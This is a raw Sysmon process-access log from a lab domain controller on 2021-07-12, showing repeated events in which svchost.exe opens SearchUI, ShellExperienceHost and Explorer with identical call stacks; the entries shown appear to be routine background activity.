07:54:10.689{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.689{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 